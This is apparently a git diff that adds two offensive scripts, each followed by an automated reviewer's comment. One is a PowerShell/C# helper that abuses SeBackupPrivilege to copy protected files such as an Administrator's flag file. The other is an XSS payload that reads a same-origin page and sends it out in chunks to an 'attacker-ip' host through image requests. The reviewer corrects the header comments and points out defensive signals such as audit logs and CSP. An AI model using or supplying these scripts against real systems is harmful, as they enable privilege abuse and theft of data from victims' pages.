diff --git a/SEBACKUPprivilege.ps1 b/SEBACKUPprivilege.ps1
new file mode 100644
index 0000000..20f5af5
--- /dev/null
+++ b/SEBACKUPprivilege.ps1
@@ -0,0 +1,40 @@
+# this script can help u abusing SEBACKUPprivilege on windows, by allowing u to copy any file
+# Usage:
+#1- copy and pase this in ur powershell terminal and then:
+# [BackupCopy]::Copy("C:\Users\Administrator\Desktop\root.txt", "C:\Temp\root-copy.txt")
+Add-Type -TypeDefinition @"
+using System;
+using System.IO;
+using System.Runtime.InteropServices;
+using Microsoft.Win32.SafeHandles;
+
+public class BackupCopy {
+ [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)]
+ public static extern SafeFileHandle CreateFile(
+ string lpFileName,
+ uint dwDesiredAccess,
+ uint dwShareMode,
+ IntPtr SecurityAttributes,
+ uint dwCreationDisposition,
+ uint dwFlagsAndAttributes,
+ IntPtr hTemplateFile
+ );
+
+ public static void Copy(string source, string dest) {
+ const uint GENERIC_READ = 0x80000000;
+ const uint FILE_SHARE_READ = 0x00000001;
+ const uint OPEN_EXISTING = 3;
+ const uint FILE_FLAG_BACKUP_SEMANTICS = 0x02000000;
+
+ var handle = CreateFile(source, GENERIC_READ, FILE_SHARE_READ, IntPtr.Zero, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero);
+ if (handle.IsInvalid)
+ throw new IOException("Access denied or file not found: " + source);
+
+ using (var fs = new FileStream(handle, FileAccess.Read))
+ using (var outFile = new FileStream(dest, FileMode.Create, FileAccess.Write)) {
+ fs.CopyTo(outFile);
+ }
+ }
+}
+"@
+
diff --git a/xss-data-extract2.js b/xss-data-extract2.js
new file mode 100644
index 0000000..1dc8a74
--- /dev/null
+++ b/xss-data-extract2.js
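Review bot: The header comment on line 1 of the new file overstates what the code does: `CreateFile` with `FILE_FLAG_BACKUP_SEMANTICS` grants nothing by itself — the open succeeds against a denying ACL only when the calling token already holds SeBackupPrivilege in an enabled state, otherwise `handle.IsInvalid` is set and the `IOException` a few lines below fires. The comment should state that precondition, e.g. `# Requires SeBackupPrivilege to be present and enabled in the current token; FILE_FLAG_BACKUP_SEMANTICS only asks the kernel to honor that privilege for this open.` That `IOException` also discards the Win32 error code that `SetLastError=true` on the `DllImport` was declared to capture, so a missing privilege, a missing file and a sharing violation all surface as the same message. Worth noting in the same header that a privileged open of this kind is what the Sensitive Privilege Use audit subcategory records, so on hosts where that auditing is enabled the script's activity appears in the security log.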
@@ -0,0 +1,17 @@
+// this can help bypassing CORS (make sure to host this script on https server in the real world)
+
+let html = "";
+
+fetch("/path/to/page/u-want-to-extract/")
+ .then(res => res.text())
+ .then(data => {
+ html = data;
+
+ // Chunk and exfil using image requests
+ const chunks = html.match(/.{1,1500}/gs); // ~1.5KB safe chunk size
+ chunks.forEach((chunk, i) => {
+ new Image().src = `https://attacker-ip/?part=${i}&data=` + encodeURIComponent(chunk);
+ });
+ });
+
+ // this will extract the page in url encoded chunks (GET safe)
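Review bot: The comment on line 1 of the new file is inaccurate: nothing here bypasses CORS. The `fetch` of a relative path on line 5 is a same-origin request, allowed only because the script already executes inside the page's own origin (the XSS precondition the filename implies), and the `Image().src` loads on line 13 are plain cross-origin GETs that CORS never governs. A header describing the actual mechanism would be `// Runs in the page's own origin; reads a same-origin document and sends it out in URL-encoded GET chunks via <img> requests (no CORS involved).` From a defensive angle the same comment could note that an `img-src` restriction in a Content-Security-Policy blocks this channel, and that a burst of `?part=N&data=` GETs to a single external host is a straightforward proxy-log signature.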